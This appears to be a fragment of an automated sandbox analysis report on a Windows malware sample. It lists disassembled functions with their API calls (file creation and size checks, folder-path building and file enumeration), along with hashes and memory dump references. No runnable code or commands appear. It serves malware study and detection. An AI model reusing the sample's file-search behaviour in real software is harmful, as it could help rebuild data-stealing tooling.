                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                      • Instruction ID: 0ab9fea244ec4bee779cbfd7f8d3f6e165031601536dd32e1e8b216a63350e9a
                      • Opcode Fuzzy Hash: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                      • Instruction Fuzzy Hash: 18112AB2904218ABCB14DFD9DE45BBEB7F8FB4CB11F10461AF645A2280E3395950C7B5
                      Function 001D92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(001D3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,001D3AEE,?), ref: 001D92FC
                      • GetFileSizeEx.KERNEL32(000000FF,001D3AEE), ref: 001D9319
                      • CloseHandle.KERNEL32(000000FF), ref: 001D9327
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID:
                      • API String ID: 1378416451-0
                      • Opcode ID: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                      • Instruction ID: d896ed4538183d2f3407ad12337edd67110cb4240434a819546fcd7ee07bf6dd
                      • Opcode Fuzzy Hash: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                      • Instruction Fuzzy Hash: BEF03779E40308BBDB14DBB0DD49B9E77B9BB48720F11C664BA51A72C0D670AA118B45
                      Function 001DC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 001DC74E
                        • Part of subcall function 001DBF9F: __amsg_exit.LIBCMT ref: 001DBFAF
                      • __getptd.LIBCMT ref: 001DC765
                      • __amsg_exit.LIBCMT ref: 001DC773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 001DC797
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                      • Instruction ID: 4dc162f7a3ba3a4bd18b9887dda62db0abd55765581348c6399eda4a01361676
                      • Opcode Fuzzy Hash: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                      • Instruction Fuzzy Hash: 41F0B432D09702DBDB21BBB8988774F33A06F10721F22494BF406AB3D2DB645941DED6
                      Function 001D4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4F7A
                      • lstrcat.KERNEL32(?,001E1070), ref: 001D4F97
                      • lstrcat.KERNEL32(?,00E39180), ref: 001D4FAB
                      • lstrcat.KERNEL32(?,001E1074), ref: 001D4FBD
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                        • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                        • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                        • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                      • Instruction ID: 1fdca972dad2863ce0813c80bd8ba4c9b7a84d70b17c8001a18f272f1f79a641
                      • Opcode Fuzzy Hash: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                      • Instruction Fuzzy Hash: 6B21987690030867C754FBB0DD56EED333CABA9300F004569B699A3181EF74DAD98B96